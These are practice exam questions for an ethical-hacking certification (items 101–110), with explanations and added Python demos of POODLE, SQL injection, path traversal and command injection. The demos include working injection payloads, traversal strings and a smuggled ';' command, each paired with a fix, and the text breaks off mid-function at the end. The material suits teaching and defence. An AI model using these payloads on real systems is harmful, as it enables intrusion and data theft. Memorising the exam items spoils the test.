ECCouncil 312-50v13 Certified Ethical Hacker v13 Exam Dumps and Practice Test Questions Set 6 Q101-120


Question 101

Which technique allows an attacker to exploit misconfigured SSL/TLS by forcing downgrade to weak encryption?

A) POODLE
B) Heartbleed
C) Shellshock
D) Meltdown

Answer: A) POODLE

Explanation:

POODLE (Padding Oracle On Downgraded Legacy Encryption) is an attack against SSL 3.0, and against some TLS implementations that copied its padding handling, that exploits a weakness in how CBC-mode padding is checked. SSL 3.0 checks only the final byte of a record, the padding-length byte, and never verifies the padding bytes themselves, so a server will accept a record whose last block has been replaced with another ciphertext block whenever that block happens to decrypt to a valid length byte. By moving a chosen ciphertext block into the padding position and watching whether the server accepts or rejects the record, an attacker with a man-in-the-middle position recovers one plaintext byte per roughly 256 requests, enough to extract cookies or authentication tokens that the victim's browser re-sends with every request. The downgrade itself comes from client fallback behaviour: when a TLS handshake fails (which the attacker can cause by dropping packets), many clients retried with an older protocol version until they reached SSL 3.0. The fixes are to disable SSL 3.0 on both ends and to support TLS_FALLBACK_SCSV, which lets a server detect and refuse a downgraded retry.

Heartbleed is a critical vulnerability in the OpenSSL library’s heartbeat extension that lets an attacker read up to 64 KB of process memory per malformed heartbeat request, from a server or a client. It is an implementation bug, not a downgrade attack: it leaks private keys, session cookies, and other secrets directly from memory without any padding manipulation or protocol negotiation. Heartbleed is about memory disclosure, not SSL/TLS downgrade exploitation.

Shellshock exploits vulnerabilities in the Bash shell to execute arbitrary commands on affected systems. While dangerous and remote-executable, it is unrelated to SSL/TLS encryption weaknesses, padding, or downgrade negotiation. Shellshock targets command execution through environment variables, not network protocol weaknesses.

Meltdown is a CPU-level vulnerability that allows attackers to read privileged kernel memory from user-mode processes. It exploits speculative execution in processors and is unrelated to SSL/TLS or encryption negotiation. Meltdown does not interact with network protocols, padding, or cryptography.

The correct answer is POODLE because it specifically leverages a protocol downgrade to SSL 3.0 and that protocol's unchecked padding to extract plaintext. Unlike Heartbleed (an implementation bug), Shellshock (command execution), or Meltdown (a processor flaw), POODLE is a protocol and cryptographic weakness whose impact depends on both client-server fallback negotiation and SSL 3.0's padding verification, which is what distinguishes it from vulnerabilities that target software execution, memory, or hardware.
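The padding-oracle step described above, simulated end to end in Python. This is an added example, not material from the exam page. The 16-byte block cipher is a toy four-round Feistel network over SHA-256 so that only the standard library is needed; the record layout (data || MAC || padding || length byte), the SSL 3.0 rule (only the final byte is checked) and the TLS 1.0 rule (every padding byte must equal the length) are the real ones. One simplification: each record gets a fresh random IV where SSL 3.0 chains the IV from the previous record; either way the block in front of the padding changes from request to request, which is what the attack needs. The request, key and cookie value are constructed sample data.

```python
"""POODLE simulated: why SSL 3.0's padding check is a decryption oracle (added example)."""
import hashlib
import hmac
import random

BLOCK = 16      # cipher block size
MAC_LEN = 20    # SSL 3.0 used a 20-byte SHA-1 MAC


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 16-byte block cipher (4-round Feistel); stands in for AES/3DES-CBC."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        cur = data[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, cur), prev))
        prev = cur
    return b"".join(out)


def make_record(key, mac_key, rng, data):
    """Victim's browser: MAC, pad to a block boundary, CBC-encrypt. Returns (iv, ciphertext)."""
    body = data + hmac.new(mac_key, data, hashlib.sha1).digest()
    pad_len = BLOCK - 1 - len(body) % BLOCK            # a whole 16-byte pad block when body is aligned
    iv = bytes(rng.randrange(256) for _ in range(BLOCK))
    return iv, cbc_encrypt(key, iv, body + bytes([pad_len]) * (pad_len + 1))


def server_accepts(key, mac_key, iv, ct, tls_padding_check):
    """Server: decrypt, strip padding, verify MAC. True iff the record is accepted."""
    pt = cbc_decrypt(key, iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    if tls_padding_check and any(b != pad_len for b in pt[-1 - pad_len:-1]):
        return False                                    # TLS 1.0+: every padding byte is inspected
    body = pt[:len(pt) - pad_len - 1]                   # SSL 3.0: the length byte alone decides
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha1).digest())


def poodle_recover_byte(key, mac_key, data, target_block, tls_padding_check, seed=1, max_tries=20000):
    """Recover the last plaintext byte of ciphertext block `target_block` (1-based; the IV is block 0).

    Requires data+MAC to fill whole blocks so the final block is pure padding. The attacker
    has the browser re-send the same request and each time copies the target block over
    that final block. SSL 3.0 accepts exactly when the moved block decrypts to 0x0F in its
    last byte, which reveals P[target][15] = 0x0F ^ C[target-1][15] ^ C[n-1][15].
    Returns (byte or None, attempts)."""
    rng = random.Random(seed)
    n = (len(data) + MAC_LEN) // BLOCK + 1              # ciphertext blocks; the last is pure padding
    for attempt in range(1, max_tries + 1):
        iv, ct = make_record(key, mac_key, rng, data)
        blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
        blocks[n] = blocks[target_block]                # the attacker's only modification
        if server_accepts(key, mac_key, iv, b"".join(blocks[1:]), tls_padding_check):
            return (BLOCK - 1) ^ blocks[target_block - 1][-1] ^ blocks[n - 1][-1], attempt
    return None, max_tries


def honest_record_accepted(seed=0):
    """Sanity check: an unmodified record passes both the SSL 3.0 and the TLS-style check."""
    iv, ct = make_record(KEY, MAC_KEY, random.Random(seed), REQUEST)
    return server_accepts(KEY, MAC_KEY, iv, ct, False), server_accepts(KEY, MAC_KEY, iv, ct, True)


# Constructed sample: 44 request bytes + 20-byte MAC fill four blocks exactly, so a
# full pad block follows; the 'C' of the cookie value sits at the end of block 2.
REQUEST = b"GET /x HTTP/1.0\r\nCookie: sid=SECRET-COOKIE-7"
KEY, MAC_KEY = b"k" * BLOCK, b"m" * BLOCK

if __name__ == "__main__":
    print("honest record accepted (ssl3, tls):", honest_record_accepted())
    byte, tries = poodle_recover_byte(KEY, MAC_KEY, REQUEST, 2, tls_padding_check=False)
    print(f"SSL 3.0 check: recovered {byte!r} ({chr(byte)}) after {tries} requests")
    print("TLS padding check:", poodle_recover_byte(KEY, MAC_KEY, REQUEST, 2, True, max_tries=500))
```

Against the SSL 3.0 check the loop finds the byte after a few hundred requests on average; against the TLS-style check the same loop never succeeds, because the moved block would have to decrypt to fifteen further bytes of 0x0F as well. In the real attack the attacker shifts the cookie one byte at a time by lengthening the request path, so each byte in turn lands at the end of a block.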

Question 102

Which attack targets database-driven applications by manipulating SQL queries via user input?

A) SQL injection
B) Cross-site scripting
C) LDAP injection
D) XML external entity injection

Answer: A) SQL injection

Explanation: 

SQL injection is a classic web application vulnerability in which attackers supply malicious SQL fragments through input fields, URL parameters, cookies, or headers so that they become part of a backend database query. The goal is often to extract sensitive data, bypass authentication, modify records, or execute administrative commands. SQL injection occurs when an application builds query text by concatenating user input, allowing the input to change the structure of the query rather than act as a value. Techniques include union-based, error-based, boolean-blind, and time-based injection, depending on how much of the database's response is visible to the attacker. The standard defence is parameterized (prepared) statements, where input travels as bound values and can never alter the query's logic, supplemented by least-privilege database accounts and input validation.

Cross-site scripting (XSS) involves injecting malicious scripts into web pages, which execute in the browsers of other users. XSS attacks target client-side environments, focusing on stealing session tokens, credentials, or defacing content. While also exploiting input validation issues, XSS does not interact with the database directly, and it does not manipulate SQL queries.

LDAP injection targets applications that construct LDAP queries using unsanitized user input. By crafting malicious input, attackers can manipulate LDAP queries to bypass authentication, enumerate directory data, or escalate privileges. LDAP injection operates at the directory query level, not relational database systems, differentiating it from SQL injection.

XML external entity (XXE) injection involves exploiting vulnerabilities in XML parsers to read local files, access sensitive data, or cause denial-of-service conditions. XXE is related to XML processing, not SQL query manipulation. Its vector is XML input, not SQL statements.

The correct answer is SQL injection because it specifically manipulates SQL queries through user-supplied input to affect database behavior. While XSS, LDAP injection, and XXE also exploit insufficient input validation, only SQL injection directly interacts with relational database engines and allows data extraction, modification, or command execution within the database context.
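The vulnerable query beside its parameterized fix, as an added example that is not code from the exam page. It runs against an in-memory SQLite database with a constructed users table, so it touches nothing real; the SHA-256 password hash is a stand-in for a proper slow, salted hash such as Argon2 or bcrypt.

```python
"""SQL injection (auth bypass and union-based extraction) beside parameterized queries."""
import hashlib
import sqlite3


def _hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()   # stand-in; use Argon2/bcrypt in production


def build_db() -> sqlite3.Connection:
    """Constructed sample data: two users, one of them an admin."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT, role TEXT)")
    for name, password, role in [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")]:
        con.execute("INSERT INTO users (username, pw_hash, role) VALUES (?, ?, ?)",
                    (name, _hash(password), role))
    return con


# --- vulnerable: user input is pasted into the SQL text and can change its structure ---

def login_vulnerable(con, username: str, password: str):
    query = (f"SELECT username, role FROM users WHERE username = '{username}' "
             f"AND pw_hash = '{_hash(password)}'")
    return con.execute(query).fetchone()        # username "alice'--" comments out the password check


def search_vulnerable(con, term: str):
    query = f"SELECT username, role FROM users WHERE username LIKE '%{term}%'"
    return con.execute(query).fetchall()        # a UNION in `term` appends any column to the result


# --- fixed: the query text is a constant; input travels as bound parameters ---

def login_safe(con, username: str, password: str):
    return con.execute("SELECT username, role FROM users WHERE username = ? AND pw_hash = ?",
                       (username, _hash(password))).fetchone()


def search_safe(con, term: str):
    # Binding stops injection; it does not stop LIKE wildcards (% and _) in `term`,
    # which is a separate concern handled by escaping or by validating the term.
    return con.execute("SELECT username, role FROM users WHERE username LIKE ?",
                       (f"%{term}%",)).fetchall()


if __name__ == "__main__":
    db = build_db()
    bypass = "alice'--"                                          # auth bypass via SQL comment
    leak = "zzz' UNION SELECT username, pw_hash FROM users--"    # union-based extraction of hashes
    print("vulnerable login :", login_vulnerable(db, bypass, "wrong password"))
    print("safe login       :", login_safe(db, bypass, "wrong password"))
    print("vulnerable search:", search_vulnerable(db, leak))
    print("safe search      :", search_safe(db, leak))
```

The bypass works because `--` turns the rest of the statement into a comment, so the password clause is never evaluated; the union payload works because the attacker controls the column list of the second SELECT and can route any column, here the password hashes, into a field the page displays. Both payloads are inert against the parameterized versions, which treat the whole string as a value.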

Question 103

Which method is commonly used to intercept and read encrypted HTTPS traffic in a man-in-the-middle scenario?

A) SSL stripping
B) ARP spoofing
C) DNS poisoning
D) TCP SYN flood

Answer: A) SSL stripping

Explanation: 

SSL stripping is a man-in-the-middle (MITM) attack that keeps a victim's browser on plain HTTP when it would otherwise have been redirected to HTTPS. The attacker, already positioned between client and server (typically via ARP spoofing or a rogue access point), intercepts the victim's initial unencrypted request, fetches the page over HTTPS from the real server, and serves it back over HTTP with every https:// link and redirect rewritten to http://. The server sees a normal TLS session; the victim sees a working site without a padlock and submits credentials and cookies in cleartext that the attacker can read and modify. The attack depends on the first request being plain HTTP (users rarely type https://) and on users not noticing the missing padlock. HTTP Strict Transport Security (HSTS), especially with browser preloading, defeats it because the browser refuses to make a plain-HTTP connection to the host at all, and cookies flagged Secure are never sent over HTTP even if a downgrade succeeds.

ARP spoofing is a network-level attack that sends falsified ARP messages to associate the attacker’s MAC address with another host’s IP, enabling MITM or session hijacking on LANs. While ARP spoofing can be used as part of an MITM setup, it does not directly strip SSL or decrypt HTTPS traffic on its own.

DNS poisoning manipulates DNS responses to redirect users to malicious domains. It enables phishing or traffic interception but does not downgrade HTTPS or remove encryption from client-server connections.

TCP SYN flood is a denial-of-service technique that overwhelms target systems by sending numerous SYN packets. It disrupts service availability but does not intercept, downgrade, or read encrypted communications.

The correct answer is SSL stripping because it alone turns what should have been an HTTPS session into cleartext that the attacker can read and modify. ARP spoofing and DNS poisoning only place the attacker in the path or redirect the victim, and a SYN flood denies service; none of them removes the encryption from a client-server connection.

Question 104

Which attack exploits input validation flaws in web applications to retrieve arbitrary files from the server?

A) Directory traversal
B) SQL injection
C) Cross-site scripting
D) Clickjacking

Answer: A) Directory traversal

Explanation: 

Directory traversal, also known as path traversal, occurs when an application fails to properly validate user-supplied file paths. Attackers exploit this to access files outside the intended directory, typically using ../ sequences to climb the filesystem hierarchy, absolute paths, or encoded variants such as %2e%2e%2f that a naive filter misses. Directory traversal can expose sensitive files such as configuration files, password stores, or system data. The attack targets filesystem access rather than application logic, client-side execution, or UI interactions. The robust defence is to canonicalize the final path (URL-decode once, resolve .. and symbolic links) and then verify that it still lies inside the allowed base directory, rather than trying to block the string ../ itself.

SQL injection manipulates database queries through user input to retrieve, modify, or delete data. While it exploits improper input validation, it targets databases rather than filesystem paths.

Cross-site scripting injects malicious scripts into web pages, targeting users’ browsers. It is a client-side attack that allows data theft, session hijacking, or UI manipulation. XSS does not retrieve server-side files directly.

Clickjacking tricks users into interacting with hidden or disguised interface elements. It exploits UI design and user behavior, not filesystem input handling or path validation.

The correct answer is directory traversal because it specifically targets improperly validated file paths to retrieve files from the server. Unlike SQL injection, XSS, or clickjacking, directory traversal operates at the filesystem layer and allows direct access to sensitive files beyond normal application permissions.
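A naive file handler beside a hardened one, as an added example that is not code from the exam page. It builds a throw-away sandbox in a temporary directory so it runs offline; the URL-decoding step mirrors what a web framework does before handing the path to application code, and the hardened version checks the canonical path rather than looking for "../" in the string.

```python
"""Directory traversal: vulnerable join beside canonicalize-and-check (added example)."""
import os
import tempfile
from urllib.parse import unquote


class TraversalError(ValueError):
    pass


def build_sandbox() -> str:
    """Constructed layout: <tmp>/public is the web root; <tmp>/config/secret.key must stay unreachable."""
    root = tempfile.mkdtemp(prefix="traversal-demo-")
    os.makedirs(os.path.join(root, "public"))
    os.makedirs(os.path.join(root, "config"))
    with open(os.path.join(root, "public", "index.html"), "wb") as f:
        f.write(b"<h1>public</h1>")
    with open(os.path.join(root, "config", "secret.key"), "wb") as f:
        f.write(b"TOP-SECRET")
    return os.path.join(root, "public")


def read_vulnerable(base_dir: str, user_path: str) -> bytes:
    # os.path.join discards base_dir entirely when user_path is absolute and
    # normalises nothing, so "../x" and "/etc/passwd" both escape the web root.
    with open(os.path.join(base_dir, unquote(user_path)), "rb") as f:
        return f.read()


def resolve_under(base_dir: str, user_path: str) -> str:
    """Canonicalize the requested path and confirm it is still inside base_dir."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, unquote(user_path)))   # resolves .. and symlinks
    if os.path.commonpath([base, candidate]) != base:
        raise TraversalError(f"path escapes web root: {user_path!r}")
    return candidate


def read_safe(base_dir: str, user_path: str) -> bytes:
    with open(resolve_under(base_dir, user_path), "rb") as f:
        return f.read()


def is_blocked(base_dir: str, user_path: str) -> bool:
    """True if the hardened resolver rejects user_path."""
    try:
        resolve_under(base_dir, user_path)
        return False
    except TraversalError:
        return True


if __name__ == "__main__":
    base = build_sandbox()
    for p in ["index.html", "../config/secret.key", "%2e%2e%2fconfig%2fsecret.key", "/etc/hostname"]:
        print(f"{p!r:40} vulnerable reads:", end=" ")
        try:
            print(read_vulnerable(base, p)[:20], end="  ")
        except OSError as e:
            print(type(e).__name__, end="  ")
        print("| hardened blocks:", is_blocked(base, p))
```

The check compares the real path's prefix against the real base directory, which also catches symbolic links planted inside the web root that point outside it. Decoding exactly once matters: decoding twice would let %252e%252e slip past a framework that already decoded the URL.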

Question 105

Which attack injects malicious code into web pages, causing victim browsers to execute scripts without consent?

A) Cross-site scripting
B) SQL injection
C) LDAP injection
D) Command injection

Answer: A) Cross-site scripting

Explanation: 

Cross-site scripting (XSS) is a client-side web vulnerability in which attackers inject malicious scripts into web pages. When other users load these pages, the browser executes the scripts in the context of the trusted site, with access to that site's cookies, DOM, and authenticated requests. Stored XSS persists on the server (for example in a comment or profile field) and affects everyone who views the page; reflected XSS is carried in a single request, such as a URL parameter, and echoed straight back in the response, so the victim must be lured into following a crafted link; DOM-based XSS arises entirely in client-side JavaScript that writes attacker-controlled data into the page. Attackers can steal cookies, perform actions on behalf of users, or deliver malware. XSS results from missing context-aware output encoding and is further limited by a Content Security Policy and HttpOnly cookies.

SQL injection exploits input fields to manipulate backend SQL queries, enabling unauthorized data retrieval or manipulation. It targets server-side database logic, not browser execution.

LDAP injection manipulates directory service queries via unsanitized input. It affects LDAP-based authentication or data access, not client-side script execution.

Command injection exploits applications that pass unsanitized input to OS commands. Attackers can execute arbitrary commands on the server but do not inject code into the client browser.

The correct answer is cross-site scripting because it uniquely injects code into web pages that execute in the user’s browser. The other attacks focus on server-side logic or command execution, not browser-side script execution within a trusted context.

Question 106

Which wireless attack involves tricking clients into connecting to a rogue access point?

A) Evil twin attack
B) Bluejacking
C) Jamming
D) WEP cracking

Answer: A) Evil twin attack

Explanation: 

An evil twin attack is a wireless threat in which an adversary stands up a rogue access point that mimics a legitimate Wi-Fi network closely enough that clients join it without noticing. The attacker duplicates the SSID and security type of the trusted network, usually transmits at a stronger signal so that clients prefer it, and often deauthenticates clients from the real access point, or jams it, to force a reconnect. Once a client connects, all of its traffic, including authentication exchanges, credentials, browsing activity, and application data, passes through the attacker-controlled device. This allows man-in-the-middle operations, payload injection, credential harvesting through fake captive-portal pages, and manipulation of cleartext data. Many devices automatically reconnect to networks they have used before, and this automatic trust is exactly what the evil twin exploits. Open or shared-password networks in airports, cafes, and hotels are particularly susceptible because the attacker can reproduce them exactly, and users tend to click through certificate warnings rather than question the wireless signal itself. Enterprise (802.1X) networks whose clients validate the authentication server's certificate resist the attack, since the rogue access point cannot present the expected certificate.

Bluejacking, listed as option B, is a Bluetooth-based technique used mostly for sending unsolicited messages or vCards to nearby devices. It is often considered more of a prank than an attack and involves Bluetooth advertising rather than Wi-Fi impersonation. Since bluejacking does not imitate access points and does not trick users into joining a rogue network, it is unrelated to evil twin behavior.

Option C, jamming, refers to the deliberate transmission of interference signals to overwhelm a wireless channel, causing legitimate devices to lose connectivity. This is a denial-of-service technique and does not involve creating rogue access points or deceiving users. While jamming can complement other attacks by forcing clients to reconnect, it alone does not cause users to join an attacker’s access point.

Option D, WEP cracking, targets the weaknesses of the obsolete WEP encryption protocol. Using techniques like IV collection and statistical analysis, attackers recover the encryption key to gain access to the network. This does not involve cloning or impersonating another AP, and no deception of client devices occurs.

Therefore, the correct answer is the evil twin attack, because it uniquely depends on imitating a legitimate wireless network to lure victims into connecting and exposing their traffic.

Question 107

Which malware records keystrokes to capture passwords, credit cards, or sensitive data?

A) Keylogger
B) Ransomware
C) Worm
D) Botnet

Answer: A) Keylogger

Explanation:

A keylogger is a specialized type of malware designed to record every keystroke typed on a victim's device. It can capture usernames, passwords, personal identification numbers, credit card details, email messages, and other sensitive information entered through the keyboard. Keyloggers exist in two primary forms: hardware keyloggers, which physically sit between the keyboard and the computer, and software keyloggers, which run within the operating system, sometimes as a kernel-mode driver or as a hook injected into other processes. Advanced keyloggers capture far more than raw keystrokes; they may take periodic screenshots, record clipboard contents, intercept form data, or monitor application behaviour. They typically run invisibly in the background, hiding their processes, disguising their file names, or injecting themselves into trusted applications. Attackers deploy keyloggers through phishing emails, malicious downloads, drive-by exploits, or trojanized software. Because a keylogger captures input before it is ever encrypted, TLS offers no protection against it, which makes it extremely valuable for credential theft, financial fraud, and identity theft; multi-factor authentication limits the damage a captured password can do.

Ransomware, option B, operates very differently. Its primary purpose is to encrypt a victim’s files or lock access to the system, followed by a demand for payment. While ransomware is financially motivated, it is not designed to monitor keystrokes. Its destructive nature contrasts with the stealth-oriented, data-harvesting design of keyloggers.

Option C, a worm, is a self-replicating piece of malware that spreads across networks without needing user interaction. Although a worm may carry a keylogger as a payload, the worm itself is not a keylogger. Its primary purpose is propagation rather than keystroke collection.

Option D, a botnet, refers to a network of compromised devices controlled remotely by an attacker through a command-and-control (C2) server. Botnets can perform distributed denial-of-service attacks, send spam, or distribute malware. While bots may deploy keyloggers on infected hosts, the botnet is the infrastructure, not the keylogging tool itself.

Therefore, the correct answer is the keylogger, because it specifically captures keystroke data, whereas ransomware, worms, and botnets operate with different primary objectives.

Question 108

Which vulnerability allows attackers to execute arbitrary OS commands via web application input?

A) Command injection
B) Cross-site scripting
C) SQL injection
D) Directory traversal

Answer: A) Command injection

Explanation:

Command injection occurs when a web application improperly handles untrusted input and passes it directly to the underlying operating system as part of a system call or shell command. When input parameters are not sanitized or validated, attackers can append malicious commands using characters such as semicolons, pipes, or logical operators. As a result, the attacker gains the ability to execute arbitrary OS-level commands with the same privileges as the web server process. This can allow file manipulation, user account modification, extraction of sensitive information, pivoting deeper into the network, or even obtaining full system compromise. Command injection is especially dangerous in scripts or applications that use system utilities, such as network diagnostic tools, file compressors, or administrative shell commands. Because the vulnerability leverages the underlying OS directly, the impact is severe and may bypass database or application-level protections altogether.

Option B, cross-site scripting (XSS), involves the injection of client-side scripts, usually JavaScript, into content that is later rendered by a victim’s browser. XSS targets end users rather than the operating system of the server hosting the application. Though harmful, its execution environment is the browser, not the OS terminal.

Option C, SQL injection, manipulates SQL queries by injecting malicious database commands. While SQL injection can allow attackers to read, modify, or delete database records, escalate privileges, or perform lateral movement via stored procedures, it does not inherently permit OS command execution unless the database engine exposes that capability and the application's account is allowed to use it (for example xp_cmdshell on Microsoft SQL Server). Its primary domain is the database layer, not the operating system shell.

Directory traversal, option D, uses crafted file path sequences such as “../” to access directories outside the intended web root. This may expose configuration files, logs, or sensitive data but does not allow execution of operating system commands. Its scope is limited to unauthorized file access rather than command execution.

Therefore, command injection is the correct answer because it uniquely enables attackers to run arbitrary OS commands through vulnerable web application inputs.
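The three ways a web handler can run `wc -c <name>` on an uploaded file, as an added example that is not code from the exam page: through a shell string, through a shell string with the argument quoted, and through an argv list behind an allowlist. It runs in a throw-away temporary directory on any POSIX system; the file name and payload are constructed.

```python
"""OS command injection: shell string, quoted shell string, and argv list (added example)."""
import os
import re
import shlex
import subprocess
import tempfile

SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")   # allowlist: no separators, no leading dash


def build_sandbox() -> str:
    """Constructed upload directory holding one 12-byte file."""
    d = tempfile.mkdtemp(prefix="cmdinj-demo-")
    with open(os.path.join(d, "notes.txt"), "wb") as f:
        f.write(b"hello world\n")
    return d


def size_vulnerable(upload_dir: str, name: str) -> str:
    """shell=True hands the whole string to /bin/sh: ';', '|', '$(...)' in `name` become shell syntax."""
    proc = subprocess.run(f"wc -c {name}", shell=True, cwd=upload_dir, capture_output=True, text=True)
    return proc.stdout


def size_quoted(upload_dir: str, name: str) -> subprocess.CompletedProcess:
    """Still a shell, but the argument is quoted; injection fails, though a leading '-' could still be parsed as an option."""
    return subprocess.run(f"wc -c {shlex.quote(name)}", shell=True, cwd=upload_dir,
                          capture_output=True, text=True)


def size_safe(upload_dir: str, name: str) -> int:
    """Validate against an allowlist, then pass an argv list: no shell is involved at all."""
    if not SAFE_NAME.match(name):
        raise ValueError(f"rejected file name: {name!r}")
    proc = subprocess.run(["wc", "-c", name], cwd=upload_dir, capture_output=True, text=True, check=True)
    return int(proc.stdout.split()[0])


def name_rejected(name: str) -> bool:
    return SAFE_NAME.match(name) is None


if __name__ == "__main__":
    d = build_sandbox()
    payload = "notes.txt; echo INJECTED"              # a second command smuggled in after ';'
    print("vulnerable:", repr(size_vulnerable(d, payload)))
    q = size_quoted(d, payload)
    print("quoted    :", repr(q.stdout), "exit", q.returncode)
    print("safe      :", size_safe(d, "notes.txt"), "bytes; payload rejected:", name_rejected(payload))
```

The vulnerable variant prints the file size and then "INJECTED", proving that the second command ran with the web process's privileges. Quoting closes that hole but leaves the shell in the loop; the argv-list version removes the shell entirely, and the allowlist stops option injection (a name beginning with "-") that even an argv list would pass through to the program.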

Question 109

Which DoS attack uses ICMP echo requests to flood a network, often amplifying traffic via broadcast addresses?

A) Smurf attack
B) SYN flood
C) Ping of Death
D) Teardrop attack

Answer: A) Smurf attack

Explanation:

A Smurf attack is a reflected, amplified denial-of-service technique that exploits the way hosts respond to ICMP echo requests sent to a broadcast address. The attacker sends ICMP echo requests to a network's directed broadcast address with the source IP spoofed to the victim's address. Every host on that network that answers broadcast pings replies with an ICMP echo reply to the spoofed source, so one request from the attacker becomes dozens or hundreds of replies aimed at the victim, quickly exhausting its bandwidth or processing capacity. The attack depends on two misconfigurations: routers that forward directed broadcasts from outside the network, and hosts that answer broadcast echo requests. Since RFC 2644 (1999) routers ship with directed-broadcast forwarding disabled, and hosts can be told to ignore broadcast ICMP, which together with ingress and egress filtering of spoofed source addresses has made classic Smurf attacks rare; networks that still forward directed broadcasts remain vulnerable.

Option B, the SYN flood, exploits the TCP three-way handshake by sending a large number of SYN packets without completing the handshake. This consumes server resources but does not rely on ICMP or broadcast amplification. It targets TCP state exhaustion, not ICMP volumetric amplification.

Option C, the Ping of Death, sends oversized or malformed ICMP packets that cause buffer overflows or crashes on vulnerable systems. It is distinct from Smurf attacks because it focuses on malformed packet delivery, not amplification or spoofing.

Option D, the Teardrop attack, uses overlapping or improperly fragmented IP packets to overwhelm systems during packet reassembly. This exploits weaknesses in the reassembly process rather than utilizing broadcast traffic or ICMP echo replies.

Therefore, the Smurf attack is the correct answer because it uniquely combines ICMP echo requests, source IP spoofing, and broadcast amplification to create a powerful DoS effect.

Question 110

Which type of scan sends TCP packets with SYN flags but does not complete the handshake to stealthily detect open ports?

A) SYN scan
B) Null scan
C) XMAS scan
D) Full connect scan

Answer: A) SYN scan

Explanation:

A SYN scan, also known as a half-open scan, is a reconnaissance technique for determining which TCP ports are open on a target. It sends a SYN packet to a port and inspects the response: a SYN/ACK means the port is open, an RST means it is closed, and no reply (or an ICMP unreachable) means it is filtered. Instead of completing the three-way handshake with an ACK, the scanner answers a SYN/ACK with an RST, tearing the connection down before it is ever established. Because the connection never completes, the target application is not invoked and does not log a connection, which makes the scan faster and quieter at the application layer; a packet-level IDS or firewall still sees every probe. Crafting the raw segments requires raw-socket privileges (Nmap's -sS needs root), which is why unprivileged scans fall back to a full connect scan.

Option B, the null scan, sends TCP packets with no flags set at all. On a stack that follows RFC 793 a closed port answers with an RST and an open port stays silent, so the scan can only report closed versus open|filtered; Windows and many embedded stacks reply with an RST regardless of state, which makes the result meaningless there. It does not involve SYN packets.

Option C, the XMAS scan, sends packets with the FIN, PSH, and URG flags enabled simultaneously. It shares the null scan's logic and limitations: it infers state from how an operating system responds to an illegal flag combination and does not use the half-open SYN-based methodology.

Option D, the full connect scan, performs the entire three-way handshake and fully opens a TCP connection to each port. This approach is more detectable, slower, and creates extensive logs, because every connection appears as a legitimate session on the target device.

Therefore, the correct answer is the SYN scan, because it uniquely sends SYN packets without completing the handshake, combining efficiency with stealth.
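The mechanics of the half-open scan in code, as an added example that is not from the exam page: the TCP segment a scanner sends, the replies it may receive, how each reply maps to a port state, and the RST it sends instead of the handshake-completing ACK. The script builds and parses raw TCP headers with struct and puts nothing on the wire (that would need a raw socket and root); addresses and ports are constructed sample values.

```python
"""Half-open (SYN) scan: probe construction, reply classification, RST teardown (added example)."""
import socket
import struct
from typing import Optional

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
TCP_HDR = "!HHIIBBHHH"      # sport, dport, seq, ack, data offset, flags, window, checksum, urgent


def _checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def _pseudo_header(src_ip: str, dst_ip: str, tcp_len: int) -> bytes:
    return socket.inet_aton(src_ip) + socket.inet_aton(dst_ip) + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len)


def build_segment(src_ip, dst_ip, sport, dport, flags, seq=0, ack=0, window=1024) -> bytes:
    """A 20-byte TCP header with a valid checksum over the IPv4 pseudo-header."""
    hdr = struct.pack(TCP_HDR, sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    csum = _checksum(_pseudo_header(src_ip, dst_ip, len(hdr)) + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def parse_segment(segment: bytes) -> dict:
    sport, dport, seq, ack, _off, flags, window, _csum, _urg = struct.unpack(TCP_HDR, segment[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags, "window": window}


def checksum_ok(src_ip: str, dst_ip: str, segment: bytes) -> bool:
    return _checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def classify(scan: str, reply: Optional[bytes]) -> str:
    """Map a probe's reply (None = nothing came back) to a port state, following Nmap's tables."""
    flags = parse_segment(reply)["flags"] if reply else 0
    if scan == "syn":
        if flags & SYN and flags & ACK:
            return "open"
        if flags & RST:
            return "closed"
        return "filtered"          # silence or ICMP unreachable (not modelled here)
    if scan in ("null", "fin", "xmas"):
        if flags & RST:
            return "closed"
        return "open|filtered"     # silence means open on RFC 793 stacks, but also what a firewall produces
    raise ValueError(scan)


def scanner_followup(reply: bytes, src_ip: str, dst_ip: str) -> Optional[bytes]:
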